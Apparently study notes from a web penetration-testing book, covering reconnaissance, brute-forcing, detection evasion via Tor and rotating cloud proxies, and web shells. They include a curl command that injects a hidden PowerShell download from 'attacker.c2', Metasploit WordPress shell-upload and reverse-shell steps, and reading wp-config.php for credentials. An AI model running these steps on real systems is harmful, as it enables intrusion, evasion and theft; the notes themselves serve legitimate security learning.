# Becoming Hacker | Hacking Notes |Pentesting Notes

**Resources**  
• Penetration Testers Framework (PTF): [https://github.com/trustedsec/](https://github.com/trustedsec/)  
ptf  
• BlackArch: [https://blackarch.org](https://blackarch.org)  
• Burp Suite: [https://portswigger.net/burp/](https://portswigger.net/burp/)  
• OWASP ZAP: [https://www.owasp.org/index.php/OWASP\_Zed\_Attack\_](https://www.owasp.org/index.php/OWASP_Zed_Attack_)  
Proxy\_Project

Amazon Web Services: [https://aws.amazon.com](https://aws.amazon.com)  
• Microsoft Azure: [https://portal.azure.com](https://portal.azure.com)  
• Google Cloud Platform: [https://cloud.google.com](https://cloud.google.com)  
• DigitalOcean: [https://www.digitalocean.com](https://www.digitalocean.com)  
• Linode: [https://www.linode.com](https://www.linode.com)

**Exercises**  
Complete the following exercises to get better acquainted with the hacker toolset  
and the tools we’ll be using throughout this book:  
1\. Download and install your preferred penetration testing distribution:  
Kali or BlackArch, or play around with PTF  
2\. Use Burp Suite Free or ZAP to intercept, inspect, and modify traffic  
to your favorite site  
3\. Create a free account on the cloud computing provider of your choice  
and use its free tier to launch a Linux virtual machine instance

1.NMAP Scan using MSF  
2.MASSCAN — It’s faster than NMAP scanning  
3.Whatweb — identity what technologies have been used to develop and run it.  
 [https://github.com/urbanadventurer/WhatWeb](https://github.com/urbanadventurer/WhatWeb).

4.Nikto — Nikto can guess subdomains,report on unusual headers, and check the robots.txt file for interesting information:  
 [https://github.com/sullo/nikto](https://github.com/sullo/nikto)

5\. CMS scanners — When the target is using a CMS, such as Joomla, Drupal, or WordPress,running an automated vulnerability testing tool should be your next step

• WPScan ([https://wpscan.org/](https://wpscan.org/)): A powerful tool aimed at testing WordPress installations  
• JoomScan ([https://github.com/rezasp/joomscan](https://github.com/rezasp/joomscan)): As the name implies, a CMS scanner specializing in Joomla testing  
• droopescan ([https://github.com/droope/droopescan](https://github.com/droope/droopescan)): A Drupal-specific scanner with some support for Joomla  
• CMSmap ([https://github.com/Dionach/CMSmap](https://github.com/Dionach/CMSmap)): A more generic scanner and brute-forcer supporting WordPress, Joomla, and Drupal

6.Efficient brute-forcingBrute-forcing a web service, for example, with the infamous rockyou.txt   
One of the better collections of common keywords, credentials, directories payloads, and even webshells is the SecLists repository:

[https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists).

[https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb)

root@kali:~/tools# git clone [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists)  
SecList Wordlist Description  
Discovery — Web content, DNS, and common Nmap ports  
Fuzzing — FuzzDB, Brutelogic, Polyglot payloads, and more  
IOCs- Malware-related indicators of compromise  
Miscellaneous — Various wordlists that may have obscure uses  
Passwords — Large numbers of wordlists for common passwords,split into top-N files  
Pattern-Matching — Wordlists for use when “grepping” for interesting information  
Payloads — Webshells for common languages, Windows Netcat,and an EICAR test file  
Usernames — Lists of common names and login IDs

**Useful information can include the following:**  
• The webserver software: Apache, NGINX, or IIS  
• Server-side development language: ASP.NET, PHP, or Java  
• Underlying operating system: Linux, Windows, or embedded  
• robots.txt  
• Interesting response headers  
• WAF detection: F5 or Akamai

The robots.txt file is generally interesting, as it can provide “hidden” directories  
or files, and can be a good starting point when brute-forcing for directories or files.  
The robots.txt file essentially provides instructions for legitimate crawler bots on  
what they’re allowed to index and what they should ignore.

A sample robots.txt file will look something like this:  
User-agent: \*  
Disallow: /cgi-bin/  
Disallow: /test/  
Disallow: /~admin/  
7\. Content discovery — tools — OWASP ZAP & Burp Suite 0r alternative automated — Gobuster

Burp Suite- Intruder module — easily perform content discovery -look for hidden directories and files, and even guess credentials  
 It supports payload processing and encoding, which enables us to customize our scanning to better interface with the target application.  
 Intruder module = same wordlists provided by SecLists

features   
.Cluster bomb attack, which is well suited for multiple payloads,such as usernames and passwords, which we will showcase later  
• Payload processing for highly customized attacks  
• Attack throttling and variable delays for low and slow attacks

**OWASP ZAP — Fuzzer module**

Gobuster- [https://github.com/OJ/gobuster](https://github.com/OJ/gobuster)  
root@kali:~# apt-get install golang  
root@kali:~# export GOPATH=~/go  
root@kali:~# export GOBIN=$GOPATH  
root@kali:~/tools# git clone [https://github.com/OJ/gobuster](https://github.com/OJ/gobuster)  
root@kali:~/tools/gobuster# go get && go buildroot@kali:~/tools/gobuster# ./gobuster

Persistent content discovery ([http://10.0.5.181/](http://10.0.5.181/) — Application Hosted)

[http://10.0.5.181/~admin/](http://10.0.5.181/~admin/)

ZAP> Fuzz Location>select the raft-small-files.txt wordlist from the SecLists repository

Payload processing  
 Intruder will let us attack the basic authentication mechanism with little effort:  
Payload:1 SecLists Usernames collection called top-usernames-shortlist.txt.   
Payload:2 500-worst-passwords.txt

Payloads> Payload Processing>Add>Base64-encode

Start Attack

**Polyglot payloads**

OWASP cross-site scripting (XSS) — [https://owasp.org/www-community/xss-filter-evasion-cheatsheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)  
[https://github.com/0xSobky](https://github.com/0xSobky)  
[https://regex101.com/](https://regex101.com/)

Same payload, different context  
A regex is a piece of text defining a search pattern. Some WAFs may use regex to try and find potentially dangerous strings inside HTTP requests.

Same payload, different context<! — Comment! \[payload\] →.

Code obfuscation

**Resources**  
Consult the following resources for more information on penetration testing tools  
and techniques:  
• Metasploit: [https://www.metasploit.com/](https://www.metasploit.com/)  
• WPScan: [https://wpscan.org/](https://wpscan.org/)  
• CMSmap: [https://github.com/Dionach/CMSmap](https://github.com/Dionach/CMSmap)  
• Recon-NG (available in Kali Linux or via the Bitbucket repository):[https://bitbucket.org/LaNMaSteR53/recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)  
• OWASP XSS Filter Evasion Cheat Sheet: [https://www.owasp.org/index.php/XSS\_Filter\_Evasion\_Cheat\_Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)  
• Elsobky’s GitHub page: [https://github.com/0xSobky](https://github.com/0xSobky)  
• Brutelogic cheat sheet: [https://brutelogic.com.br/blog/cheat-sheet/](https://brutelogic.com.br/blog/cheat-sheet/)  
• SecLists repository: [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists)  
• FuzzDB: [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb)

\========================================  
**Chapter- 3 Low-Hanging Fruit**

Network assessmentroot@kali:~# msfconsole  
As with all engagements involving Metasploit, we start by creating a workspace specifically for the scope:  
msf > workspace -a ecorp  
For this scenario, our target is a black-box API application provided by E Corp.The target host will be api.ecorp.local.

Nmap is our network recon tool of choice and coupled with Metasploit’s workspace, it becomes even more powerful. The Metasploit console wrapper command for Nmap is the db\_nmap command. The Nmap switches that we will use for discovering open ports, and querying services for more information, are detailed in the following text.

\-sV will instruct Nmap to perform a version scan of any identified service  
\-A will provide us with some host fingerprinting, attempting to detect the operating system.  
\-T4 option is used to tell Nmap to be more aggressive when scanning the network  
\-Pn switch will prevent Nmap from performing a ping of the target  
\-p1- scan all possible ports -p1–65535

msf > db\_nmap -sV -A -T4 -Pn -p1- api.ecorp.local

msf > services  
MariaDB service which is the communitydeveloped fork for the MySQL software  
a list of public Common Vulnerabilities and Exposures (CVEs)

msf > use auxiliary/scanner/mysql/mysql\_version

We can view more information on the mysql\_version module by issuing the show info command

msf auxiliary(mysql\_version) > services -s mysql -R  
RHOSTS => 10.0.5.198msf auxiliary(mysql\_version) >  
 setg RHOSTS 10.0.5.198  
RHOSTS => 10.0.5.198  
msf auxiliary(mysql\_version) > run   
msf auxiliary(mysql\_version) > services -s mysql

Back in the Kali Linux terminal, we can use the mysql client command to attempt to authenticate as root (-u) to the api.ecorp.local host (-h):root@kali:~# mysql -uroot -hapi.ecorp.local

**Credential guessing**  
msf > use auxiliary/scanner/mysql/mysql\_login  
msf auxiliary(mysql\_login) > show options  
msf auxiliary(mysql\_login) > set THREADS 10msf auxiliary(mysql\_login) > set VERBOSE falsemsf auxiliary(mysql\_login) > set STOP\_ON\_SUCCESS truemsf auxiliary(mysql\_login) >  
 set USERNAME root  
USERNAME => root  
msf auxiliary(mysql\_login) > set PASS\_FILE ~/tools/SecLists/Passwords/Common-Credentials/10-million-password-listtop-500.txt  
PASS\_FILE => ~/tools/SecLists/Passwords/Common-Credentials/10-millionpassword-list-top-10000.txt  
msf auxiliary(mysql\_login) >msf auxiliary(mysql\_login) > run

A better way to shell  
[https://tools.kali.org/maintaining-access/weevely](https://tools.kali.org/maintaining-access/weevely)  
[https://null-byte.wonderhowto.com/how-to/slip-backdoor-into-php-websites-with-weevely-0175211/](https://null-byte.wonderhowto.com/how-to/slip-backdoor-into-php-websites-with-weevely-0175211/)  
[https://www.youtube.com/watch?v=Ig-HS6kxz4Q](https://www.youtube.com/watch?v=Ig-HS6kxz4Q)  
Weevely is a weaponized web shell installed on Kali Linux by default. It is very easy to use. It generates an obfuscated, password-protected PHP shell that can replace our earlier system() shell example. Weevely features some useful functionality that goes above and beyond the traditional system pass-through shell, including the following:  
• A familiar terminal interface  
• Network pivots  
• File upload and download  
• Reverse and direct TCP shell  
• Meterpreter support

root@kali:/var/www/html# weevely generate <password> </path/to/shell.php>

root@kali:/var/www/html# weevely generate ECorpAppTest11251 /var/www/html/shell.php

root@kali:/var/www/html# python -m SimpleHTTPServer 80  
   
 -m switch to load the SimpleHTTPServer module

root@kali:/var/www/html# curl -G  
[http://api.ecorp.local/xampp/xampp.php](http://api.ecorp.local/xampp/xampp.php) — data-urlencode  
“password=ECorpAppTest11251& cmd=powershell -w hidden -noni -nop -c(new-object net.webclient).DownloadFile(  
‘[http://attacker.c2/test.php','c:\\xampp\\htdocs\\xampp\\test.php'](http://attacker.c2/test.php%27,%27c:%5Cxampp%5Chtdocs%5Cxampp%5Ctest.php%27))"

**Resources**  
Consult the following resources for more information on penetration testing tools and techniques:  
• Mitre provides a handy website with all the CVEs available: [http://cve.mitre.org/](http://cve.mitre.org/)  
• Weevely documentation and bleeding edge-code is available on GitHub:[https://github.com/epinna/weevely3](https://github.com/epinna/weevely3)

\========================================  
**Chapter-4 Advanced Brute-forcing**

• Password spraying attacks  
• Metadata harvesting and public site scraping  
• Using Tor to evade intrusion detection systems (IDS)  
• Using Amazon Web Services (AWS) to evade IDS

Password sprayingA common issue that comes up with brute-forcing for account credentials is that the backend authentication system may simply lockout the target account after too many invalid attempts are made in a short period of time. Microsoft’s Active  
Directory (AD)

Outlook Web Access (OWA), Lightweight Directory Access Protocol (LDAP)

LinkedIn scrapingsite:linkedin.com inurl:”/pub/” -inurl:”/dir/” “at \[TargetCompany\]”

save all account details in txt file

root@kali:~/tools# python name2account.py > target\_accounts.txt

Metadata

[https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA)  
[https://www.elevenpaths.com/labstools/foca/index.html](https://www.elevenpaths.com/labstools/foca/index.html)  
[https://www.youtube.com/watch?v=Ou4TRvzYpVk](https://www.youtube.com/watch?v=Ou4TRvzYpVk)

The cluster bomb  
 Intruder module>Positions>Cluster bomb

Behind seven proxies  
IDS, intrusion prevention systems (IPS), and security information and event management (SIEM)

Torify -[https://www.torproject.org/](https://www.torproject.org/)

root@kali:~# apt-get install tor torsocks  
Torsocks can be found on the Tor Project Git repository [https://gitweb.torproject.org/torsocks.git](https://gitweb.torproject.org/torsocks.git)

root@kali:~# tor

ProxyChains is available on all penetration testing distros and on  
[http://proxychains.sourceforge.net/](http://proxychains.sourceforge.net/).

Configuring the upstream SOCKS proxy in Burp  
Burp Suite>Project options > Override user options  
check to enable the SOCKS configuration fields. The values for SOCKS proxy and  
port will be localhost and 9050 respectively, and it’s a good idea to make DNS  
lookups through the proxy as well.

Repeater module, to ipinfo.io

root@kali:~# torsocks — shell  
/usr/bin/torsocks: New torified shell coming right up…

root@kali:~# curl ipinfo.io

root@kali:~# killall -HUP tor  
root@kali:~# curl ipinfo.io  
root@kali:~# killall -HUP tor  
root@kali:~# curl ipinfo.ioroot@kali:~# killall -HUP   
root@kali:~# curl ipinfo.ioroot@kali:~# killall -HUP torroot@kali:~# curl ipinfo.io  
root@kali:~# watch -n10 killall -HUP tor  
 -n option specifies how often to execute the killall command.

As expected, the c2.spider.ml application server log shows the attack coming  
in every 10 seconds from a new exit node IP.

root@spider-c2–1:/var/www# php -S 0.0.0.0:80  
A list of active Tor exit nodes can be found here: [https://check.torproject.org/cgi-bin/TorBulkExitList.py](https://check.torproject.org/cgi-bin/TorBulkExitList.py).

Proxy cannon — alternative to using Tor  
[https://github.com/Shellntel/scripts/blob/master/proxyCannon.py](https://github.com/Shellntel/scripts/blob/master/proxyCannon.py)

There are countless Infrastructure as a Service (IaaS) providers, each with a large IP  
space available for free to VM instances. VMs are cheap and sometimes free as well,  
so routing our traffic through them should be fairly cost effective.

By default, ProxyCannon creates t2.nano virtual instances in AWS, which should  
be free for a limited time with new accounts. They have very little resources but are  
typically enough for most attacks. To change the type of instance, we can supply the  
\-t switch. The default region is us-east-1 and can be adjusted using the — region  
switch.

root@kali:~/tools# pip install -U botoroot@kali:~/tools# python proxyCannon.py -h

We can start ProxyCannon using the -r and -l switches, and specify that we want 3 instances running at the same time.root@kali:~/tools# python proxyCannon.py -r -l 3What is the AWS Access Key Id: d2hhdCBhcmUgeW91IGRvaW5nWhat is the AWS Secret Access Key: dW5mb3J0dW5hdGVseSB0aGlzIGlzIG5vdCB0aGUgcmVhbCBrZXku

root@kali:~/tools# cat ~/.boto

root@kali:~# watch -n30 curl [http://c2.spider.ml==============================](http://c2.spider.ml==========================================================================================================)

**Chapter — 5 — File Inclusion Attacks**  
In this chapter, we will cover the following topics:  
• RFI Remote File Inclusion  
• LFI Local File Inclusion  
• File upload abuse  
• Chaining vulnerabilities to achieve code execution

DVWA can be downloaded in various formats, including an easy to run live CD, from [http://www.dvwa.co.uk/.To](http://www.dvwa.co.uk/.To) keep things simple, our instance of DVWA will be accessible via [http://dvwa.app.internal](http://dvwa.app.internal).

RFI  
[https://www.youtube.com/watch?v=EjauGmb\_wDU](https://www.youtube.com/watch?v=EjauGmb_wDU)  
[https://www.youtube.com/watch?v=5jeZtYay\_xM](https://www.youtube.com/watch?v=5jeZtYay_xM)

[https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/](https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/)

LFIhttps://[www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/](http://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/)  
[https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601](https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601)  
[https://www.youtube.com/watch?v=s3XQ1n5kdeQ](https://www.youtube.com/watch?v=s3XQ1n5kdeQ)

\========================================  
**Chapter -6 — Out-of-Band Exploitation**

In this chapter, we will look at the following:  
• Creating a C2 server  
• Using INetSim to emulate services  
• Confirming vulnerabilities using out-of-band techniques  
• Advanced data exfiltration

A common scenario  
[https://www.notsosecure.com/oob-exploitation-cheatsheet/](https://www.notsosecure.com/oob-exploitation-cheatsheet/)

[https://certbot.eff.org/](https://certbot.eff.org/)

[https://letsencrypt.org/](https://letsencrypt.org/)

[https://www.inetsim.org/index.html](https://www.inetsim.org/index.html)

\========================================  
**Chapter — 7 — Automated Testing**

This chapter will expose you to valuable tools and by the end, you should be able to:  
• Extend the attack proxy to automate tedious tasks  
• Configure Burp to use the public Collaborator instance  
• Deploy our own Collaborator instance

Extending Burp  
 > BApp Store > Options   
Jython is available on [http://www.jython.org/downloads.html](http://www.jython.org/downloads.html) as a standalone JAR file.  
JRuby is available on [http://jruby.org/download](http://jruby.org/download) as a complete JAR file.

Additional Scanner Checks extension> Refresh > Install

Authentication and authorization abuse  
One of the most tedious application security tests is an authentication or authorization  
check. The basic steps to verify for this type of vulnerability go something like this:  
1\. Authenticate with a known-good account  
2\. Capture the session ID  
3\. Crawl the application with this session ID  
4\. Open a new application session  
5\. Authenticate with a separate known-good account  
6\. Capture the session ID  
7\. Replay the crawl with the new session ID:  
° Check for vertical or horizontal escalation  
8\. Replay the crawl anonymously, without a session ID:  
° Check for authentication bypass issues

BApp Store > Autorize

The Autorize flow  
[https://appsec-labs.com/autorize/](https://appsec-labs.com/autorize/)  
[https://github.com/Quitten/Autorize](https://github.com/Quitten/Autorize)  
[https://www.youtube.com/watch?v=3K1-a7dnA60&t=357s](https://www.youtube.com/watch?v=3K1-a7dnA60&t=357s)  
A new request is made through the attack proxy:  
1\. Replace the Cookie header with the other session ID  
2\. Replay the request:  
° Does the response match the original request’s? Alert \[Bypassed!\]  
3\. Remove the Cookie header  
4\. Replay the request:  
° Does the response match the original request’s? Alert \[Bypassed!\]

The Swiss Army knife  
The CO2 plugin can be downloaded from the BApp Store or from GitHub at [https://github.com/portswigger/co2](https://github.com/portswigger/co2).

sqlmap helper  
[https://github.com/sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap)  
[https://www.sqlinjection.net/sqlmap/tutorial/](https://www.sqlinjection.net/sqlmap/tutorial/)  
[https://tools.kali.org/vulnerability-analysis/sqlmap](https://tools.kali.org/vulnerability-analysis/sqlmap)  
[https://websec.ca/kb/sql\_injection](https://websec.ca/kb/sql_injection)  
[https://hackertarget.com/sqlmap-tutorial/](https://hackertarget.com/sqlmap-tutorial/)

root@kali:~/tools# git clone [https://github.com/sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap)  
root@kali:~/tools/sqlmap# ls -lah sqlmap.py  
root@kali:~/tools/sqlmap#

sqlmap will save the session of each attack in a folder under the home directory: ~/.sqlmap/output/\[target\]

Web shells  
[https://medium.com/@alpinoacademy/threat-hunting-detecting-web-shells-d9e1e8c6de2a](https://medium.com/@alpinoacademy/threat-hunting-detecting-web-shells-d9e1e8c6de2a)

Obfuscating code

root@kali:~/tools# git clone [https://github.com/naneau/php-](https://github.com/naneau/php-) obfuscator phpobfs  
root@kali:~/tools/# apt-get install composer  
root@kali:~/tools/phpobfs# composer install  
root@kali:~/tools/phpobfs# bin/obfuscate obfuscate ~/tools/shells/ads.php ~/tools/shells/out/  
root@kali:~/tools/shells# ls -lah ads.php out/ads.php

[https://medium.com/better-programming/code-obfuscation-introduction-to-code-obfuscation-part-1-93a6797349b0](https://medium.com/better-programming/code-obfuscation-introduction-to-code-obfuscation-part-1-93a6797349b0)

Burp Collaborator

[https://portswigger.net/burp/documentation/collaborator](https://portswigger.net/burp/documentation/collaborator)

Burp Collaborator client  
[https://portswigger.net/burp/documentation/desktop/tools/collaborator-client](https://portswigger.net/burp/documentation/desktop/tools/collaborator-client)  
[https://www.youtube.com/watch?v=sGe7rHg80-k](https://www.youtube.com/watch?v=sGe7rHg80-k)

Private Collaborator server  
[https://portswigger.net/burp/documentation/collaborator/deploying](https://portswigger.net/burp/documentation/collaborator/deploying)  
[https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70](https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70)  
\========================================  
**Chapter-8 -Bad Serialization**  
[https://github.com/NickstaDB/DeserLab](https://github.com/NickstaDB/DeserLab)

\===============================  
**Chapter -9 — Practical Client-Side Attacks**

Cross-Site Request Forgery (CSRF) attacks  
same-origin policy (SOP)

By the end of the chapter, you should be comfortable with:• Stored, reflected, and DOM-based XSS• CSRF and possible attacks and limitations• BeEF, the de facto tool for client-side exploitation in the browser

The SOP will permit the following types of cross-origin objects to be embedded into the origin from any other site:• Images• Stylesheets• Scripts (which the browser will gladly execute!)• Inline frames (iframe)

CDNJS is an open-source web CDN providing almost every conceivable JavaScript library. More information on this great service can be found at [https://cdnjs.com/](https://cdnjs.com/).

Cross-origin resource sharing

[https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)

XSS

Reflected XSS

[https://github.com/mpirnat/lets-be-bad-guys](https://github.com/mpirnat/lets-be-bad-guys)

Persistent XSS  
DOM-based XSS  
CSRF  
BeEF  
root@spider-c2:~# git clone [https://github.com/beefproject/beef](https://github.com/beefproject/beef)  
root@spider-c2:~/beef# ./install

\========================================  
**Chapter — 10 Practical Server-Side Attacks**  
The goal of this chapter is to get you comfortable with XML attacks and, by the end, you will be familiar with:• DoS conditions• Server-Side Request Forgery (SSRF) attacks• Information leaks• Blind exploitation and out-of-band exfiltration of data• Remote code execution

Internal and external references  
XXE attacks  
Request forgery  
Information leak — [https://github.com/mpirnat/lets-be-bad-guys](https://github.com/mpirnat/lets-be-bad-guys)

CyberChef is a great tool for data manipulation, available online or for download from GCHQ at [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/).

Blind XXE  
Remote code execution  
Interactive shells

\========================================  
**Chapter — 11 — Attacking APIs**  
Application programming interfaces (APIs)  
Windows API (WinAPI),  
By the end of the chapter, you will be comfortable with:• The different types of web API architecture• How APIs handle authentication• JSON Web Tokens (JWTs)• Automating API attacks

API communication protocols  
• Representational State Transfer (REST)• Simple Object Access Protocol (SOAP)

SOAP  
SOAP was developed by Microsoft because Distributed Component Object Model(DCOM) is a binary protocol, which makes communication over the internet a bit more complicated. SOAP leverages XML instead, a more structured and human-readable language, to exchange messages between the client and the server

[https://www.w3.org/TR/soap12/](https://www.w3.org/TR/soap12/)

REST  
RESTful APIs operate over HTTP and they make heavy use of the protocol verbs, including but not limited to:• GET• POST• PUT• DELETE

API authentication  
Basic authentication — man-in-the-middle (MITM) attacks  
API keys  
Bearer authentication  
JWTs — [https://oauth.net/2/](https://oauth.net/2/)

Burp JWT support  
[https://github.com/ozzi-/JWT4B](https://github.com/ozzi-/JWT4B)

Postman  
[https://www.postman.com/](https://www.postman.com/)  
[https://github.com/mattvaldes/vulnerable-api](https://github.com/mattvaldes/vulnerable-api)  
Installation — root@kali:~/tools# apt-get install libgconf-2–4  
root@kali:~/tools# wget [https://dl.pstmn.io/download/latest/linux64](https://dl.pstmn.io/download/latest/linux64) -O postman.tar.gz  
root@kali:~/tools# tar zxvf postman.tar.gz  
root@kali:~/tools# ~/tools/Postman/Postman

Upstream proxy  
 Burp or OWASP ZAP

\========================================  
**Chapter -12 Attacking CMS**  
In the coming pages, we will look at WordPress attacks in depth and by the end, you should be comfortable with the following:• Testing WordPress with various tools• Setting up persistence within the WordPress code once you get access• Backdooring WordPress to harvest credentials and other interesting data

Application assessment

WPScan  
root@kali:~# wpscan — url [http://cookingwithfire.local/](http://cookingwithfire.local/) — proxy 127.0.0.1:8080

Using an upstream proxy with WPScan can generate a ton of data in Burp’s proxy history, especially when performing a credential attack or active scan.

The default user agent (WPScan vX.X.X) can be changed with the — user-agent switch or randomized with — random-agent.

WPScan is available on Kali and most penetration testing distributions. It can also be found on [https://wpscan.org/](https://wpscan.org/) or cloned from GitHub: [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan).

root@kali:~# wpscan — url [http://cookingwithfire.local/](http://cookingwithfire.local/)

To specify the type of scan we want to conduct, the — enumerate (-e for short) switch accepts several parameters for active detection:• u — Look for usernames with IDs from 1 to 10• u\[10–20\] — Look for usernames with IDs from 10 to 20: — enumerate u\[15\]• p — Look for popular plugins• vp — Show me only vulnerable plugins• ap — Look for all known plugins• tt — Search for timthumbs• t — Enumerate popular themes• vt — Show me only vulnerable themes• at — Look for all known themesYou can also provide multiple — enumerate (or -e) switches to enumerate themes, plugins, and usernames all in one shot. For example, this combination of switches will perform a fairly thorough scan

root@kali:~# wpscan — url \[url\] -e ap -e at -e u

searchsploit results for Google Document Embedder

sqlmap  
[https://github.com/wp-plugins/google-document-embedder/tags?after=2.5.1](https://github.com/wp-plugins/google-document-embedder/tags?after=2.5.1)

Droopescan  
root@kali:~/tools# git clone [https://github.com/droope/droopescan](https://github.com/droope/droopescan)  
root@kali:~/tools# cd droopescan/  
root@kali:~/tools/droopescan# ls  
root@kali:~/tools/droopescan# pip install -r requirements.txt  
root@kali:~/tools/droopescan#  
root@kali:~/tools/droopescan# python setup.py install  
root@kali:~# droopescan scan drupal -u [http://ramblings.local](http://ramblings.local) -t 8

Arachni web scanner  
[https://www.arachni-scanner.com/](https://www.arachni-scanner.com/)  
root@kali:~/tools/arachni/bin# ./arachni\_web\_create\_user   
root@kali:~/tools/arachni/bin# ./arachni\_web

Arachni comes with three scanning profiles by default:• Default• Cross-Site Scripting (XSS)• SQL injection

Persistence

root@kali:~# wpscan — url [http://cookingwithfire.local/](http://cookingwithfire.local/) — enumerate u

root@kali:~# wpscan — url [http://cookingwithfire.local/](http://cookingwithfire.local/) — usernames mary — passwords ~/tools/SecLists/Passwords/Leaked- Databases/rockyou-10.txt

For this attack, we will use SecLists’ rockyou-10.txt wordlist and we’ll target mary. As before, we can invoke wpscan with the — url parameter, then we will specify a username and point the passwords parameter to the rockyou-10.txt file from SecLists.

root@kali:~# msfconsole -q  
msf > use exploit/unix/webapp/wp\_admin\_shell\_upload  
msf exploit(unix/webapp/wp\_admin\_shell\_upload) > options  
msf exploit(unix/webapp/wp\_admin\_shell\_upload) > run  
meterpreter > sysinfo  
meterpreter > getuid  
msf > use payload/php/meterpreter/reverse\_tcp  
msf payload(php/meterpreter/reverse\_tcp) > options  
msf payload(php/meterpreter/reverse\_tcp) > generate -h  
msf payload(php/meterpreter/reverse\_tcp) > generate -t raw

msf > use exploit/multi/handler  
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse\_tcp  
msf exploit(multi/handler) > options  
msf exploit(multi/handler) > set ExitOnSession false

We can now run the handler with the -j option, which will send it to the background, ready for incoming connections from our victim:  
msf exploit(multi/handler) > run -j

root@kali:~# curl [http://cookingwithfire.local/wp-](http://cookingwithfire.local/wp-) content/themes/twentyseventeen/404.php

Credential exfiltration  
meterpreter > cat /var/www/html/wp-config.php
